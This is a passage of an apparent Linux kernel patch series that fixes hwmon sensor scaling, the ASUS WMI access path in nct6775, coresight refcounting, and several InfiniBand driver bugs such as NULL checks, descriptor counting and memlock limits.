++	value = DIV_ROUND_CLOSEST(data->volt[index] * 3300, 255);
++
++	return sprintf(buf, "%d\n", value);
+ }
+ 
+ static ssize_t temp_value_show(struct device *dev,
+@@ -361,13 +364,15 @@ static ssize_t temp_value_show(struct device *dev,
+ {
+ 	struct fts_data *data = dev_get_drvdata(dev);
+ 	int index = to_sensor_dev_attr(devattr)->index;
+-	int err;
++	int value, err;
+ 
+ 	err = fts_update_device(data);
+ 	if (err < 0)
+ 		return err;
+ 
+-	return sprintf(buf, "%u\n", data->temp_input[index]);
++	value = (data->temp_input[index] - 64) * 1000;
++
++	return sprintf(buf, "%d\n", value);
+ }
+ 
+ static ssize_t temp_fault_show(struct device *dev,
+@@ -436,13 +441,15 @@ static ssize_t fan_value_show(struct device *dev,
+ {
+ 	struct fts_data *data = dev_get_drvdata(dev);
+ 	int index = to_sensor_dev_attr(devattr)->index;
+-	int err;
++	int value, err;
+ 
+ 	err = fts_update_device(data);
+ 	if (err < 0)
+ 		return err;
+ 
+-	return sprintf(buf, "%u\n", data->fan_input[index]);
++	value = data->fan_input[index] * 60;
++
++	return sprintf(buf, "%d\n", value);
+ }
+ 
+ static ssize_t fan_source_show(struct device *dev,
+diff --git a/drivers/hwmon/ltc2945.c b/drivers/hwmon/ltc2945.c
+index 9adebb59f6042..c06ab7317431f 100644
+--- a/drivers/hwmon/ltc2945.c
++++ b/drivers/hwmon/ltc2945.c
+@@ -248,6 +248,8 @@ static ssize_t ltc2945_value_store(struct device *dev,
+ 
+ 	/* convert to register value, then clamp and write result */
+ 	regval = ltc2945_val_to_reg(dev, reg, val);
++	if (regval < 0)
++		return regval;
+ 	if (is_power_reg(reg)) {
+ 		regval = clamp_val(regval, 0, 0xffffff);
+ 		regbuf[0] = regval >> 16;
+diff --git a/drivers/hwmon/mlxreg-fan.c b/drivers/hwmon/mlxreg-fan.c
+index b48bd7c961d66..96017cc8da7ec 100644
+--- a/drivers/hwmon/mlxreg-fan.c
++++ b/drivers/hwmon/mlxreg-fan.c
+@@ -155,6 +155,12 @@ mlxreg_fan_read(struct device *dev, enum hwmon_sensor_types type, u32 attr,
+ 			if (err)
+ 				return err;
+ 
++			if (MLXREG_FAN_GET_FAULT(regval, tacho->mask)) {
++				/* FAN is broken - return zero for FAN speed. */
++				*val = 0;
++				return 0;
++			}
++
+ 			*val = MLXREG_FAN_GET_RPM(regval, fan->divider,
+ 						  fan->samples);
+ 			break;
+diff --git a/drivers/hwmon/nct6775-core.c b/drivers/hwmon/nct6775-core.c
+index da9ec6983e139..c54233f0369b2 100644
+--- a/drivers/hwmon/nct6775-core.c
++++ b/drivers/hwmon/nct6775-core.c
+@@ -1150,7 +1150,7 @@ static int nct6775_write_fan_div(struct nct6775_data *data, int nr)
+ 	if (err)
+ 		return err;
+ 	reg &= 0x70 >> oddshift;
+-	reg |= data->fan_div[nr] & (0x7 << oddshift);
++	reg |= (data->fan_div[nr] & 0x7) << oddshift;
+ 	return nct6775_write_value(data, fandiv_reg, reg);
+ }
+ 
+diff --git a/drivers/hwmon/nct6775-platform.c b/drivers/hwmon/nct6775-platform.c
+index bf43f73dc835f..76c6b564d7fc4 100644
+--- a/drivers/hwmon/nct6775-platform.c
++++ b/drivers/hwmon/nct6775-platform.c
+@@ -17,7 +17,6 @@
+ #include <linux/module.h>
+ #include <linux/platform_device.h>
+ #include <linux/regmap.h>
+-#include <linux/wmi.h>
+ 
+ #include "nct6775.h"
+ 
+@@ -107,40 +106,51 @@ struct nct6775_sio_data {
+ 	void (*sio_exit)(struct nct6775_sio_data *sio_data);
+ };
+ 
+-#define ASUSWMI_MONITORING_GUID		"466747A0-70EC-11DE-8A39-0800200C9A66"
++#define ASUSWMI_METHOD			"WMBD"
+ #define ASUSWMI_METHODID_RSIO		0x5253494F
+ #define ASUSWMI_METHODID_WSIO		0x5753494F
+ #define ASUSWMI_METHODID_RHWM		0x5248574D
+ #define ASUSWMI_METHODID_WHWM		0x5748574D
+ #define ASUSWMI_UNSUPPORTED_METHOD	0xFFFFFFFE
++#define ASUSWMI_DEVICE_HID		"PNP0C14"
++#define ASUSWMI_DEVICE_UID		"ASUSWMI"
++#define ASUSMSI_DEVICE_UID		"AsusMbSwInterface"
++
++#if IS_ENABLED(CONFIG_ACPI)
++/*
++ * ASUS boards have only one device with WMI "WMBD" method and have provided
++ * access to only one SuperIO chip at 0x0290.
++ */
++static struct acpi_device *asus_acpi_dev;
++#endif
+ 
+ static int nct6775_asuswmi_evaluate_method(u32 method_id, u8 bank, u8 reg, u8 val, u32 *retval)
+ {
+-#if IS_ENABLED(CONFIG_ACPI_WMI)
++#if IS_ENABLED(CONFIG_ACPI)
++	acpi_handle handle = acpi_device_handle(asus_acpi_dev);
+ 	u32 args = bank | (reg << 8) | (val << 16);
+-	struct acpi_buffer input = { (acpi_size) sizeof(args), &args };
+-	struct acpi_buffer output = { ACPI_ALLOCATE_BUFFER, NULL };
++	struct acpi_object_list input;
++	union acpi_object params[3];
++	unsigned long long result;
+ 	acpi_status status;
+-	union acpi_object *obj;
+-	u32 tmp = ASUSWMI_UNSUPPORTED_METHOD;
+-
+-	status = wmi_evaluate_method(ASUSWMI_MONITORING_GUID, 0,
+-				     method_id, &input, &output);
+ 
++	params[0].type = ACPI_TYPE_INTEGER;
++	params[0].integer.value = 0;
++	params[1].type = ACPI_TYPE_INTEGER;
++	params[1].integer.value = method_id;
++	params[2].type = ACPI_TYPE_BUFFER;
++	params[2].buffer.length = sizeof(args);
++	params[2].buffer.pointer = (void *)&args;
++	input.count = 3;
++	input.pointer = params;
++
++	status = acpi_evaluate_integer(handle, ASUSWMI_METHOD, &input, &result);
+ 	if (ACPI_FAILURE(status))
+ 		return -EIO;
+ 
+-	obj = output.pointer;
+-	if (obj && obj->type == ACPI_TYPE_INTEGER)
+-		tmp = obj->integer.value;
+-
+ 	if (retval)
+-		*retval = tmp;
+-
+-	kfree(obj);
++		*retval = (u32)result & 0xFFFFFFFF;
+ 
+-	if (tmp == ASUSWMI_UNSUPPORTED_METHOD)
+-		return -ENODEV;
+ 	return 0;
+ #else
+ 	return -EOPNOTSUPP;
+@@ -1099,6 +1109,91 @@ static const char * const asus_wmi_boards[] = {
+ 	"TUF GAMING Z490-PLUS (WI-FI)",
+ };
+ 
++static const char * const asus_msi_boards[] = {
++	"EX-B660M-V5 PRO D4",
++	"PRIME B650-PLUS",
++	"PRIME B650M-A",
++	"PRIME B650M-A AX",
++	"PRIME B650M-A II",
++	"PRIME B650M-A WIFI",
++	"PRIME B650M-A WIFI II",
++	"PRIME B660M-A D4",
++	"PRIME B660M-A WIFI D4",
++	"PRIME X670-P",
++	"PRIME X670-P WIFI",
++	"PRIME X670E-PRO WIFI",
++	"Pro B660M-C-D4",
++	"ProArt B660-CREATOR D4",
++	"ProArt X670E-CREATOR WIFI",
++	"ROG CROSSHAIR X670E EXTREME",
++	"ROG CROSSHAIR X670E GENE",
++	"ROG CROSSHAIR X670E HERO",
++	"ROG MAXIMUS XIII EXTREME GLACIAL",
++	"ROG MAXIMUS Z690 EXTREME",
++	"ROG MAXIMUS Z690 EXTREME GLACIAL",
++	"ROG STRIX B650-A GAMING WIFI",
++	"ROG STRIX B650E-E GAMING WIFI",
++	"ROG STRIX B650E-F GAMING WIFI",
++	"ROG STRIX B650E-I GAMING WIFI",
++	"ROG STRIX B660-A GAMING WIFI D4",
++	"ROG STRIX B660-F GAMING WIFI",
++	"ROG STRIX B660-G GAMING WIFI",
++	"ROG STRIX B660-I GAMING WIFI",
++	"ROG STRIX X670E-A GAMING WIFI",
++	"ROG STRIX X670E-E GAMING WIFI",
++	"ROG STRIX X670E-F GAMING WIFI",
++	"ROG STRIX X670E-I GAMING WIFI",
++	"ROG STRIX Z590-A GAMING WIFI II",
++	"ROG STRIX Z690-A GAMING WIFI D4",
++	"TUF GAMING B650-PLUS",
++	"TUF GAMING B650-PLUS WIFI",
++	"TUF GAMING B650M-PLUS",
++	"TUF GAMING B650M-PLUS WIFI",
++	"TUF GAMING B660M-PLUS WIFI",
++	"TUF GAMING X670E-PLUS",
++	"TUF GAMING X670E-PLUS WIFI",
++	"TUF GAMING Z590-PLUS WIFI",
++};
++
++#if IS_ENABLED(CONFIG_ACPI)
++/*
++ * Callback for acpi_bus_for_each_dev() to find the right device
++ * by _UID and _HID and return 1 to stop iteration.
++ */
++static int nct6775_asuswmi_device_match(struct device *dev, void *data)
++{
++	struct acpi_device *adev = to_acpi_device(dev);
++	const char *uid = acpi_device_uid(adev);
++	const char *hid = acpi_device_hid(adev);
++
++	if (hid && !strcmp(hid, ASUSWMI_DEVICE_HID) && uid && !strcmp(uid, data)) {
++		asus_acpi_dev = adev;
++		return 1;
++	}
++
++	return 0;
++}
++#endif
++
++static enum sensor_access nct6775_determine_access(const char *device_uid)
++{
++#if IS_ENABLED(CONFIG_ACPI)
++	u8 tmp;
++
++	acpi_bus_for_each_dev(nct6775_asuswmi_device_match, (void *)device_uid);
++	if (!asus_acpi_dev)
++		return access_direct;
++
++	/* if reading chip id via ACPI succeeds, use WMI "WMBD" method for access */
++	if (!nct6775_asuswmi_read(0, NCT6775_PORT_CHIPID, &tmp) && tmp) {
++		pr_debug("Using Asus WMBD method of %s to access %#x chip.\n", device_uid, tmp);
++		return access_asuswmi;
++	}
++#endif
++
++	return access_direct;
++}
++
+ static int __init sensors_nct6775_platform_init(void)
+ {
+ 	int i, err;
+@@ -1109,7 +1204,6 @@ static int __init sensors_nct6775_platform_init(void)
+ 	int sioaddr[2] = { 0x2e, 0x4e };
+ 	enum sensor_access access = access_direct;
+ 	const char *board_vendor, *board_name;
+-	u8 tmp;
+ 
+ 	err = platform_driver_register(&nct6775_driver);
+ 	if (err)
+@@ -1122,15 +1216,13 @@ static int __init sensors_nct6775_platform_init(void)
+ 	    !strcmp(board_vendor, "ASUSTeK COMPUTER INC.")) {
+ 		err = match_string(asus_wmi_boards, ARRAY_SIZE(asus_wmi_boards),
+ 				   board_name);
+-		if (err >= 0) {
+-			/* if reading chip id via WMI succeeds, use WMI */
+-			if (!nct6775_asuswmi_read(0, NCT6775_PORT_CHIPID, &tmp) && tmp) {
+-				pr_info("Using Asus WMI to access %#x chip.\n", tmp);
+-				access = access_asuswmi;
+-			} else {
+-				pr_err("Can't read ChipID by Asus WMI.\n");
+-			}
+-		}
++		if (err >= 0)
++			access = nct6775_determine_access(ASUSWMI_DEVICE_UID);
++
++		err = match_string(asus_msi_boards, ARRAY_SIZE(asus_msi_boards),
++				   board_name);
++		if (err >= 0)
++			access = nct6775_determine_access(ASUSMSI_DEVICE_UID);
+ 	}
+ 
+ 	/*
+diff --git a/drivers/hwmon/peci/cputemp.c b/drivers/hwmon/peci/cputemp.c
+index 57470fda5f6c9..30850a479f61f 100644
+--- a/drivers/hwmon/peci/cputemp.c
++++ b/drivers/hwmon/peci/cputemp.c
+@@ -402,7 +402,7 @@ static int create_temp_label(struct peci_cputemp *priv)
+ 	unsigned long core_max = find_last_bit(priv->core_mask, CORE_NUMS_MAX);
+ 	int i;
+ 
+-	priv->coretemp_label = devm_kzalloc(priv->dev, core_max * sizeof(char *), GFP_KERNEL);
++	priv->coretemp_label = devm_kzalloc(priv->dev, (core_max + 1) * sizeof(char *), GFP_KERNEL);
+ 	if (!priv->coretemp_label)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/hwtracing/coresight/coresight-cti-core.c b/drivers/hwtracing/coresight/coresight-cti-core.c
+index d2cf4f4848e1b..838872f2484d3 100644
+--- a/drivers/hwtracing/coresight/coresight-cti-core.c
++++ b/drivers/hwtracing/coresight/coresight-cti-core.c
+@@ -151,9 +151,16 @@ static int cti_disable_hw(struct cti_drvdata *drvdata)
+ {
+ 	struct cti_config *config = &drvdata->config;
+ 	struct coresight_device *csdev = drvdata->csdev;
++	int ret = 0;
+ 
+ 	spin_lock(&drvdata->spinlock);
+ 
++	/* don't allow negative refcounts, return an error */
++	if (!atomic_read(&drvdata->config.enable_req_count)) {
++		ret = -EINVAL;
++		goto cti_not_disabled;
++	}
++
+ 	/* check refcount - disable on 0 */
+ 	if (atomic_dec_return(&drvdata->config.enable_req_count) > 0)
+ 		goto cti_not_disabled;
+@@ -171,12 +178,12 @@ static int cti_disable_hw(struct cti_drvdata *drvdata)
+ 	coresight_disclaim_device_unlocked(csdev);
+ 	CS_LOCK(drvdata->base);
+ 	spin_unlock(&drvdata->spinlock);
+-	return 0;
++	return ret;
+ 
+ 	/* not disabled this call */
+ cti_not_disabled:
+ 	spin_unlock(&drvdata->spinlock);
+-	return 0;
++	return ret;
+ }
+ 
+ void cti_write_single_reg(struct cti_drvdata *drvdata, int offset, u32 value)
+diff --git a/drivers/hwtracing/coresight/coresight-cti-sysfs.c b/drivers/hwtracing/coresight/coresight-cti-sysfs.c
+index 6d59c815ecf5e..71e7a8266bb32 100644
+--- a/drivers/hwtracing/coresight/coresight-cti-sysfs.c
++++ b/drivers/hwtracing/coresight/coresight-cti-sysfs.c
+@@ -108,10 +108,19 @@ static ssize_t enable_store(struct device *dev,
+ 	if (ret)
+ 		return ret;
+ 
+-	if (val)
++	if (val) {
++		ret = pm_runtime_resume_and_get(dev->parent);
++		if (ret)
++			return ret;
+ 		ret = cti_enable(drvdata->csdev);
+-	else
++		if (ret)
++			pm_runtime_put(dev->parent);
++	} else {
+ 		ret = cti_disable(drvdata->csdev);
++		if (!ret)
++			pm_runtime_put(dev->parent);
++	}
++
+ 	if (ret)
+ 		return ret;
+ 	return size;
+diff --git a/drivers/hwtracing/coresight/coresight-etm4x-core.c b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+index 80fefaba58eeb..c7a65d1524fcb 100644
+--- a/drivers/hwtracing/coresight/coresight-etm4x-core.c
++++ b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+@@ -424,8 +424,10 @@ static int etm4_enable_hw(struct etmv4_drvdata *drvdata)
+ 		etm4x_relaxed_write32(csa, config->vipcssctlr, TRCVIPCSSCTLR);
+ 	for (i = 0; i < drvdata->nrseqstate - 1; i++)
+ 		etm4x_relaxed_write32(csa, config->seq_ctrl[i], TRCSEQEVRn(i));
+-	etm4x_relaxed_write32(csa, config->seq_rst, TRCSEQRSTEVR);
+-	etm4x_relaxed_write32(csa, config->seq_state, TRCSEQSTR);
++	if (drvdata->nrseqstate) {
++		etm4x_relaxed_write32(csa, config->seq_rst, TRCSEQRSTEVR);
++		etm4x_relaxed_write32(csa, config->seq_state, TRCSEQSTR);
++	}
+ 	etm4x_relaxed_write32(csa, config->ext_inp, TRCEXTINSELR);
+ 	for (i = 0; i < drvdata->nr_cntr; i++) {
+ 		etm4x_relaxed_write32(csa, config->cntrldvr[i], TRCCNTRLDVRn(i));
+@@ -1631,8 +1633,10 @@ static int __etm4_cpu_save(struct etmv4_drvdata *drvdata)
+ 	for (i = 0; i < drvdata->nrseqstate - 1; i++)
+ 		state->trcseqevr[i] = etm4x_read32(csa, TRCSEQEVRn(i));
+ 
+-	state->trcseqrstevr = etm4x_read32(csa, TRCSEQRSTEVR);
+-	state->trcseqstr = etm4x_read32(csa, TRCSEQSTR);
++	if (drvdata->nrseqstate) {
++		state->trcseqrstevr = etm4x_read32(csa, TRCSEQRSTEVR);
++		state->trcseqstr = etm4x_read32(csa, TRCSEQSTR);
++	}
+ 	state->trcextinselr = etm4x_read32(csa, TRCEXTINSELR);
+ 
+ 	for (i = 0; i < drvdata->nr_cntr; i++) {
+@@ -1760,8 +1764,10 @@ static void __etm4_cpu_restore(struct etmv4_drvdata *drvdata)
+ 	for (i = 0; i < drvdata->nrseqstate - 1; i++)
+ 		etm4x_relaxed_write32(csa, state->trcseqevr[i], TRCSEQEVRn(i));
+ 
+-	etm4x_relaxed_write32(csa, state->trcseqrstevr, TRCSEQRSTEVR);
+-	etm4x_relaxed_write32(csa, state->trcseqstr, TRCSEQSTR);
++	if (drvdata->nrseqstate) {
++		etm4x_relaxed_write32(csa, state->trcseqrstevr, TRCSEQRSTEVR);
++		etm4x_relaxed_write32(csa, state->trcseqstr, TRCSEQSTR);
++	}
+ 	etm4x_relaxed_write32(csa, state->trcextinselr, TRCEXTINSELR);
+ 
+ 	for (i = 0; i < drvdata->nr_cntr; i++) {
+diff --git a/drivers/hwtracing/ptt/hisi_ptt.c b/drivers/hwtracing/ptt/hisi_ptt.c
+index 5d5526aa60c40..30f1525639b57 100644
+--- a/drivers/hwtracing/ptt/hisi_ptt.c
++++ b/drivers/hwtracing/ptt/hisi_ptt.c
+@@ -356,8 +356,18 @@ static int hisi_ptt_register_irq(struct hisi_ptt *hisi_ptt)
+ 
+ static int hisi_ptt_init_filters(struct pci_dev *pdev, void *data)
+ {
++	struct pci_dev *root_port = pcie_find_root_port(pdev);
+ 	struct hisi_ptt_filter_desc *filter;
+ 	struct hisi_ptt *hisi_ptt = data;
++	u32 port_devid;
++
++	if (!root_port)
++		return 0;
++
++	port_devid = PCI_DEVID(root_port->bus->number, root_port->devfn);
++	if (port_devid < hisi_ptt->lower_bdf ||
++	    port_devid > hisi_ptt->upper_bdf)
++		return 0;
+ 
+ 	/*
+ 	 * We won't fail the probe if filter allocation failed here. The filters
+diff --git a/drivers/i2c/busses/i2c-designware-common.c b/drivers/i2c/busses/i2c-designware-common.c
+index bceaf70f4e237..6fdb25a5f8016 100644
+--- a/drivers/i2c/busses/i2c-designware-common.c
++++ b/drivers/i2c/busses/i2c-designware-common.c
+@@ -465,7 +465,7 @@ void __i2c_dw_disable(struct dw_i2c_dev *dev)
+ 	dev_warn(dev->dev, "timeout in disabling adapter\n");
+ }
+ 
+-unsigned long i2c_dw_clk_rate(struct dw_i2c_dev *dev)
++u32 i2c_dw_clk_rate(struct dw_i2c_dev *dev)
+ {
+ 	/*
+ 	 * Clock is not necessary if we got LCNT/HCNT values directly from
+diff --git a/drivers/i2c/busses/i2c-designware-core.h b/drivers/i2c/busses/i2c-designware-core.h
+index 4d3a3b464ecd8..56a029da448a7 100644
+--- a/drivers/i2c/busses/i2c-designware-core.h
++++ b/drivers/i2c/busses/i2c-designware-core.h
+@@ -322,7 +322,7 @@ int i2c_dw_init_regmap(struct dw_i2c_dev *dev);
+ u32 i2c_dw_scl_hcnt(u32 ic_clk, u32 tSYMBOL, u32 tf, int cond, int offset);
+ u32 i2c_dw_scl_lcnt(u32 ic_clk, u32 tLOW, u32 tf, int offset);
+ int i2c_dw_set_sda_hold(struct dw_i2c_dev *dev);
+-unsigned long i2c_dw_clk_rate(struct dw_i2c_dev *dev);
++u32 i2c_dw_clk_rate(struct dw_i2c_dev *dev);
+ int i2c_dw_prepare_clk(struct dw_i2c_dev *dev, bool prepare);
+ int i2c_dw_acquire_lock(struct dw_i2c_dev *dev);
+ void i2c_dw_release_lock(struct dw_i2c_dev *dev);
+diff --git a/drivers/idle/intel_idle.c b/drivers/idle/intel_idle.c
+index cfeb24d40d378..f060ac7376e69 100644
+--- a/drivers/idle/intel_idle.c
++++ b/drivers/idle/intel_idle.c
+@@ -168,13 +168,7 @@ static __cpuidle int intel_idle_irq(struct cpuidle_device *dev,
+ 
+ 	raw_local_irq_enable();
+ 	ret = __intel_idle(dev, drv, index);
+-
+-	/*
+-	 * The lockdep hardirqs state may be changed to 'on' with timer
+-	 * tick interrupt followed by __do_softirq(). Use local_irq_disable()
+-	 * to keep the hardirqs state correct.
+-	 */
+-	local_irq_disable();
++	raw_local_irq_disable();
+ 
+ 	return ret;
+ }
+diff --git a/drivers/iio/light/tsl2563.c b/drivers/iio/light/tsl2563.c
+index 951f35ef3f41d..47a4626e94610 100644
+--- a/drivers/iio/light/tsl2563.c
++++ b/drivers/iio/light/tsl2563.c
+@@ -705,6 +705,7 @@ static int tsl2563_probe(struct i2c_client *client,
+ 	struct iio_dev *indio_dev;
+ 	struct tsl2563_chip *chip;
+ 	struct tsl2563_platform_data *pdata = client->dev.platform_data;
++	unsigned long irq_flags;
+ 	int err = 0;
+ 	u8 id = 0;
+ 
+@@ -760,10 +761,15 @@ static int tsl2563_probe(struct i2c_client *client,
+ 		indio_dev->info = &tsl2563_info_no_irq;
+ 
+ 	if (client->irq) {
++		irq_flags = irq_get_trigger_type(client->irq);
++		if (irq_flags == IRQF_TRIGGER_NONE)
++			irq_flags = IRQF_TRIGGER_RISING;
++		irq_flags |= IRQF_ONESHOT;
++
+ 		err = devm_request_threaded_irq(&client->dev, client->irq,
+ 					   NULL,
+ 					   &tsl2563_event_handler,
+-					   IRQF_TRIGGER_RISING | IRQF_ONESHOT,
++					   irq_flags,
+ 					   "tsl2563_event",
+ 					   indio_dev);
+ 		if (err) {
+diff --git a/drivers/infiniband/hw/cxgb4/cm.c b/drivers/infiniband/hw/cxgb4/cm.c
+index 499a425a33791..ced615b5ea096 100644
+--- a/drivers/infiniband/hw/cxgb4/cm.c
++++ b/drivers/infiniband/hw/cxgb4/cm.c
+@@ -2676,6 +2676,9 @@ static int pass_establish(struct c4iw_dev *dev, struct sk_buff *skb)
+ 	u16 tcp_opt = ntohs(req->tcp_opt);
+ 
+ 	ep = get_ep_from_tid(dev, tid);
++	if (!ep)
++		return 0;
++
+ 	pr_debug("ep %p tid %u\n", ep, ep->hwtid);
+ 	ep->snd_seq = be32_to_cpu(req->snd_isn);
+ 	ep->rcv_seq = be32_to_cpu(req->rcv_isn);
+@@ -4144,6 +4147,10 @@ static int rx_pkt(struct c4iw_dev *dev, struct sk_buff *skb)
+ 
+ 	if (neigh->dev->flags & IFF_LOOPBACK) {
+ 		pdev = ip_dev_find(&init_net, iph->daddr);
++		if (!pdev) {
++			pr_err("%s - failed to find device!\n", __func__);
++			goto free_dst;
++		}
+ 		e = cxgb4_l2t_get(dev->rdev.lldi.l2t, neigh,
+ 				    pdev, 0);
+ 		pi = (struct port_info *)netdev_priv(pdev);
+diff --git a/drivers/infiniband/hw/cxgb4/restrack.c b/drivers/infiniband/hw/cxgb4/restrack.c
+index ff645b955a082..fd22c85d35f4f 100644
+--- a/drivers/infiniband/hw/cxgb4/restrack.c
++++ b/drivers/infiniband/hw/cxgb4/restrack.c
+@@ -238,7 +238,7 @@ int c4iw_fill_res_cm_id_entry(struct sk_buff *msg,
+ 	if (rdma_nl_put_driver_u64_hex(msg, "history", epcp->history))
+ 		goto err_cancel_table;
+ 
+-	if (epcp->state == LISTEN) {
++	if (listen_ep) {
+ 		if (rdma_nl_put_driver_u32(msg, "stid", listen_ep->stid))
+ 			goto err_cancel_table;
+ 		if (rdma_nl_put_driver_u32(msg, "backlog", listen_ep->backlog))
+diff --git a/drivers/infiniband/hw/erdma/erdma_verbs.c b/drivers/infiniband/hw/erdma/erdma_verbs.c
+index 62be98e2b9414..19c69ea1b0c0f 100644
+--- a/drivers/infiniband/hw/erdma/erdma_verbs.c
++++ b/drivers/infiniband/hw/erdma/erdma_verbs.c
+@@ -1089,12 +1089,14 @@ int erdma_mmap(struct ib_ucontext *ctx, struct vm_area_struct *vma)
+ 		prot = pgprot_device(vma->vm_page_prot);
+ 		break;
+ 	default:
+-		return -EINVAL;
++		err = -EINVAL;
++		goto put_entry;
+ 	}
+ 
+ 	err = rdma_user_mmap_io(ctx, vma, PFN_DOWN(entry->address), PAGE_SIZE,
+ 				prot, rdma_entry);
+ 
++put_entry:
+ 	rdma_user_mmap_entry_put(rdma_entry);
+ 	return err;
+ }
+diff --git a/drivers/infiniband/hw/hfi1/sdma.c b/drivers/infiniband/hw/hfi1/sdma.c
+index a95b654f52540..8ed20392e9f0d 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.c
++++ b/drivers/infiniband/hw/hfi1/sdma.c
+@@ -3160,8 +3160,7 @@ int _pad_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx)
+ {
+ 	int rval = 0;
+ 
+-	tx->num_desc++;
+-	if ((unlikely(tx->num_desc == tx->desc_limit))) {
++	if ((unlikely(tx->num_desc + 1 == tx->desc_limit))) {
+ 		rval = _extend_sdma_tx_descs(dd, tx);
+ 		if (rval) {
+ 			__sdma_txclean(dd, tx);
+@@ -3174,6 +3173,7 @@ int _pad_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx)
+ 		SDMA_MAP_NONE,
+ 		dd->sdma_pad_phys,
+ 		sizeof(u32) - (tx->packet_len & (sizeof(u32) - 1)));
++	tx->num_desc++;
+ 	_sdma_close_tx(dd, tx);
+ 	return rval;
+ }
+diff --git a/drivers/infiniband/hw/hfi1/sdma.h b/drivers/infiniband/hw/hfi1/sdma.h
+index d8170fcbfbdd5..b023fc461bd51 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.h
++++ b/drivers/infiniband/hw/hfi1/sdma.h
+@@ -631,14 +631,13 @@ static inline void sdma_txclean(struct hfi1_devdata *dd, struct sdma_txreq *tx)
+ static inline void _sdma_close_tx(struct hfi1_devdata *dd,
+ 				  struct sdma_txreq *tx)
+ {
+-	tx->descp[tx->num_desc].qw[0] |=
+-		SDMA_DESC0_LAST_DESC_FLAG;
+-	tx->descp[tx->num_desc].qw[1] |=
+-		dd->default_desc1;
++	u16 last_desc = tx->num_desc - 1;
++
++	tx->descp[last_desc].qw[0] |= SDMA_DESC0_LAST_DESC_FLAG;
++	tx->descp[last_desc].qw[1] |= dd->default_desc1;
+ 	if (tx->flags & SDMA_TXREQ_F_URGENT)
+-		tx->descp[tx->num_desc].qw[1] |=
+-			(SDMA_DESC1_HEAD_TO_HOST_FLAG |
+-			 SDMA_DESC1_INT_REQ_FLAG);
++		tx->descp[last_desc].qw[1] |= (SDMA_DESC1_HEAD_TO_HOST_FLAG |
++					       SDMA_DESC1_INT_REQ_FLAG);
+ }
+ 
+ static inline int _sdma_txadd_daddr(
+@@ -655,6 +654,7 @@ static inline int _sdma_txadd_daddr(
+ 		type,
+ 		addr, len);
+ 	WARN_ON(len > tx->tlen);
++	tx->num_desc++;
+ 	tx->tlen -= len;
+ 	/* special cases for last */
+ 	if (!tx->tlen) {
+@@ -666,7 +666,6 @@ static inline int _sdma_txadd_daddr(
+ 			_sdma_close_tx(dd, tx);
+ 		}
+ 	}
+-	tx->num_desc++;
+ 	return rval;
+ }
+ 
+diff --git a/drivers/infiniband/hw/hfi1/user_pages.c b/drivers/infiniband/hw/hfi1/user_pages.c
+index 7bce963e2ae69..36aaedc651456 100644
+--- a/drivers/infiniband/hw/hfi1/user_pages.c
++++ b/drivers/infiniband/hw/hfi1/user_pages.c
+@@ -29,33 +29,52 @@ MODULE_PARM_DESC(cache_size, "Send and receive side cache size limit (in MB)");
+ bool hfi1_can_pin_pages(struct hfi1_devdata *dd, struct mm_struct *mm,
+ 			u32 nlocked, u32 npages)
+ {
+-	unsigned long ulimit = rlimit(RLIMIT_MEMLOCK), pinned, cache_limit,
+-		size = (cache_size * (1UL << 20)); /* convert to bytes */
+-	unsigned int usr_ctxts =
+-			dd->num_rcv_contexts - dd->first_dyn_alloc_ctxt;
+-	bool can_lock = capable(CAP_IPC_LOCK);
++	unsigned long ulimit_pages;
++	unsigned long cache_limit_pages;
++	unsigned int usr_ctxts;
+ 
+ 	/*
+-	 * Calculate per-cache size. The calculation below uses only a quarter
+-	 * of the available per-context limit. This leaves space for other
+-	 * pinning. Should we worry about shared ctxts?
++	 * Perform RLIMIT_MEMLOCK based checks unless CAP_IPC_LOCK is present.
+ 	 */
+-	cache_limit = (ulimit / usr_ctxts) / 4;
+-
+-	/* If ulimit isn't set to "unlimited" and is smaller than cache_size. */
+-	if (ulimit != (-1UL) && size > cache_limit)
+-		size = cache_limit;
+-
+-	/* Convert to number of pages */
+-	size = DIV_ROUND_UP(size, PAGE_SIZE);
+-
+-	pinned = atomic64_read(&mm->pinned_vm);
++	if (!capable(CAP_IPC_LOCK)) {
++		ulimit_pages =
++			DIV_ROUND_DOWN_ULL(rlimit(RLIMIT_MEMLOCK), PAGE_SIZE);
++
++		/*
++		 * Pinning these pages would exceed this process's locked memory
++		 * limit.
++		 */
++		if (atomic64_read(&mm->pinned_vm) + npages > ulimit_pages)
++			return false;
++
++		/*
++		 * Only allow 1/4 of the user's RLIMIT_MEMLOCK to be used for HFI
++		 * caches.  This fraction is then equally distributed among all
++		 * existing user contexts.  Note that if RLIMIT_MEMLOCK is
++		 * 'unlimited' (-1), the value of this limit will be > 2^42 pages
++		 * (2^64 / 2^12 / 2^8 / 2^2).
++		 *
++		 * The effectiveness of this check may be reduced if I/O occurs on
++		 * some user contexts before all user contexts are created.  This
++		 * check assumes that this process is the only one using this
++		 * context (e.g., the corresponding fd was not passed to another
++		 * process for concurrent access) as there is no per-context,
++		 * per-process tracking of pinned pages.  It also assumes that each
++		 * user context has only one cache to limit.
++		 */
++		usr_ctxts = dd->num_rcv_contexts - dd->first_dyn_alloc_ctxt;
++		if (nlocked + npages > (ulimit_pages / usr_ctxts / 4))
++			return false;
++	}
+ 
+-	/* First, check the absolute limit against all pinned pages. */
+-	if (pinned + npages >= ulimit && !can_lock)
++	/*
++	 * Pinning these pages would exceed the size limit for this cache.
++	 */
++	cache_limit_pages = cache_size * (1024 * 1024) / PAGE_SIZE;
++	if (nlocked + npages > cache_limit_pages)
+ 		return false;
+ 
+-	return ((nlocked + npages) <= size) || can_lock;
++	return true;
+ }
+ 
+ int hfi1_acquire_user_pages(struct mm_struct *mm, unsigned long vaddr, size_t npages,
+diff --git a/drivers/infiniband/hw/hns/hns_roce_main.c b/drivers/infiniband/hw/hns/hns_roce_main.c
+index 8ba68ac12388d..946ba1109e878 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_main.c
++++ b/drivers/infiniband/hw/hns/hns_roce_main.c
+@@ -443,14 +443,15 @@ static int hns_roce_mmap(struct ib_ucontext *uctx, struct vm_area_struct *vma)
+ 		prot = pgprot_device(vma->vm_page_prot);
+ 		break;
+ 	default:
